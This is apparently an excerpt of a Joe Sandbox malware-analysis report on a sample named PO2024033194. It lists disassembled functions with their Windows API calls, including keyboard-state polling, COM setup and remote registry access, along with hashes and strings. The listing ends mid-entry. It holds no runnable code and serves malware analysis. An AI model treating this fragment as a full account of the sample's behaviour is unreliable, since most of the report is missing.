                                                                  Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                  • _memmove.LIBCMT ref: 00467EB8
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                  • _memmove.LIBCMT ref: 00467F6C
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                  • String ID:
                                                                  • API String ID: 2170234536-0
                                                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                  Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                  Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                  Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                  • DeleteObject.GDI32(?), ref: 0047151E
                                                                  • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                  • DeleteObject.GDI32(?), ref: 004715EA
                                                                  • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3218148540-0
                                                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                  Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                  Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcsncpy.LIBCMT ref: 00467490
                                                                  • _wcsncpy.LIBCMT ref: 004674BC
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • _wcstok.LIBCMT ref: 004674FF
                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                  • String ID: X
                                                                  • API String ID: 3104067586-3081909835
                                                                  • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                  • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                  • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                  • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                  Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                  • _wcslen.LIBCMT ref: 0046CDB0
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 440038798-2785691316
                                                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                  Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                  • _wcslen.LIBCMT ref: 004610A3
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                  • String ID: ThumbnailClass
                                                                  • API String ID: 4136854206-1241985126
                                                                  • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                  • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                  • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                  • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                  Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                  • String ID: 2
                                                                  • API String ID: 1331449709-450215437
                                                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                  Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                  • API String ID: 3054410614-2561132961
                                                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                  Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 600699880-22481851
                                                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                  Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
